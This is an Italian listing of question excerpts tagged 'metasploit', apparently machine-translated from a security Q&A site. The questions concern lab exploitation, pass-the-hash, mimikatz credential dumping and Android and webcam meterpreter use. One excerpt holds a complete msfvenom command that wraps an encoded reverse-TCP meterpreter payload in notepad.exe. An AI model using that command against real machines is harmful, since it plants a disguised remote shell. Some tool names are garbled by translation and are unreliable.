Domande con tag 'metasploit'

domande con tag
1
risposta

Amazon AWS Kali - Metasploit

Sto utilizzando il marketplace di Amazon Kali e sto provando a testare CVE-2017-0199 per vedere se le mie impostazioni proxy per bloccare il contenuto dell'applicazione / hta funzionano. C'è un modulo in metasploit che mi permette di testarlo...
posta 19.05.2017 - 09:58
1
risposta

Aiuto nella creazione del server vulnerabile Heartbleed

Uso la rete interna Virtualbox con Kali Linux e Ubuntu 12.04. La versione di OpenSSL per Ubuntu è 1.0.1 che dovrebbe essere vulnerabile. Ho creato un server HTTPS usando nginx su Ubuntu e quando scrivo con nmap su Kali Linux mostra che la porta...
posta 17.12.2016 - 01:47
2
risposte

Passa l'hash ad identificarsi come utente del dominio invece di rimanere bloccato come NT Authority \ System

Recentemente ho scoperto che il passaggio dei cred di amministratore locale e amministratore di dominio a una macchina Windows 7 remota produce lo stesso risultato: accesso a quella macchina come NT Authority \ System. L'unico modo che ho trovat...
posta 14.09.2016 - 21:41
1
risposta

Errore durante l'utilizzo del modulo metasymatz di metasploit

Sto lavorando per scaricare le password in chiaro da una macchina compromessa (è il mio computer, la ricerca, bla bla bla) Comunque, sto ricevendo uno strano errore durante l'esecuzione del modulo metasploit in una sessione meterpreter. Posso...
posta 17.09.2016 - 02:57
1
risposta

Tomcat War Payload non funziona

Quindi attualmente sto lavorando su alcuni libri. Uno dei quali mi ha scaricato il metasploitable2 vm. Questa macchina ha un server tomcat in esecuzione su di esso che ho sfruttato con successo usando Metasploit. Ho usato Metasploit per forzar...
posta 14.09.2016 - 15:26
1
risposta

Come faccio a rendere questa istruzione usando msfvenom?

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -x /tmp/notepad.exe LHOST=192.168.10.1 LPORT=45631 -b "\x00" -f exe-only > notepad.exe e poi se scarico notepad.exe in Windows 7, voglio imple...
posta 08.09.2016 - 06:43
1
risposta

Meterpreter Avvertimenti webcam_snap [chiuso]

Da quando ho aggiornato metasploit ogni volta che eseguo il comando webcam_snap in meterpreter ricevo molti avvertimenti come quelli qui sotto, perché appaiono? Gtk-WARNING **: Theme parsing error: gtk-contained-dark.css:498:67: Using one colo...
posta 26.09.2016 - 16:06
2
risposte

Msfvenom meterpreter android architectures

C'è qualche architettura Android posso impostare il mio payload meter_tetro reverse_http su quello che funziona su ogni telefono Android? Fondamentalmente, quando non imposto alcuna architettura, esso viene automaticamente impostato da dalvik...
posta 27.09.2016 - 17:33
1
risposta

Sessione non valida Android meterpreter

Ogni volta che uso un heter metrico inverso su un telefono Android su Internet, viene creata una sessione, ma dopo alcuni secondi si dice che la sessione non è valida e si chiude. Quando lo faccio sulla LAN funziona perfettamente. Quindi qual'è...
posta 26.09.2016 - 17:54
2
risposte

Come usare meterpreter exe standalone con una chiave USB collegata a una sessione vittima sbloccata

Quando ho bisogno di fare un POC sul perché è pericoloso lasciare la sessione sbloccata, ho usato per mettere un mimikatz su una chiave USB e ottenere le credenziali di accesso in chiaro. Ma a volte il client non ha il privilegio di debug in mod...
posta 06.07.2016 - 16:31